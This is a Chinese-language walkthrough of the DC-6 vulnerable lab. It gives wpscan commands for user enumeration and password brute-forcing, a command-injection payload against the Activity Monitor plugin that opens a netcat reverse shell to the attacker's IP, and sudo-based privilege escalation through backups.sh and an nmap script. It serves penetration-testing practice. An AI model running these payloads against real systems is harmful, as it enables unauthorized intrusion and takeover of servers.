简介
DC-6是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。这不是一个过于困难的挑战,所以应该是伟大的初学者。这个挑战的最终目标是获得根并阅读唯一的旗帜。
Linux技能和熟悉Linux命令行是必须的,有一些基本渗透测试工具的经验也是必须的。
getshell
官方有给一个提示
卡里的大字典的一部分,先把这个字典保存下来。
访问web端页面发现是wordpress,而且提示又有字典,那就用wpscan
探测下用户
wpscan --url "http://wordy" --enumerate u
爆破账号密码
wpscan --url "http://wordy/" -U /home/kali/user.txt -P /home/kali/passwords.txt
成功等到一个用户mark/helpdesk01
,但是不急,再爆破一下ssh,ssh爆破无果,乖乖登陆。博客首页一直在提示插件,正好在后台发现了一个插件activity monitor
。然后百度这个插件的漏洞
命令执行漏洞
反弹shell
127.0.0.1| nc -e /bin/bash 192.168.43.201 1234
提权
在/home/mark/stuff
里面翻到一个账号密码
接下来去登陆 graham
用户,登陆了过后sudo -l
发现可以不需要jens密码以他的身份使用backups.sh,那直接往这个shell脚本里写入一些恶意代码然后以jens身份执行。
写入/bin/bash
开启一个shell,
但是需要用jens身份运行,那就相当于开启了jens的shell
sudo -u jens ./backups.sh
再次sudo -l
,同样发现可以不需要密码通过root身份运行nmap
nmap提权,看了一下版本7.40
,不存在老版本的交互方式提权。但是nmap依然可以脚本,创建一个脚本,用nmap执行即可
echo 'os.execute("/bin/sh")' > getshell
sudo nmap --script=getshell
总结
-
以某个用户执行脚本的方法
sudo -u username a.sh
-
nmap执行脚本
echo 'os.execute("/bin/sh")' > getshell sudo nmap --script=getshell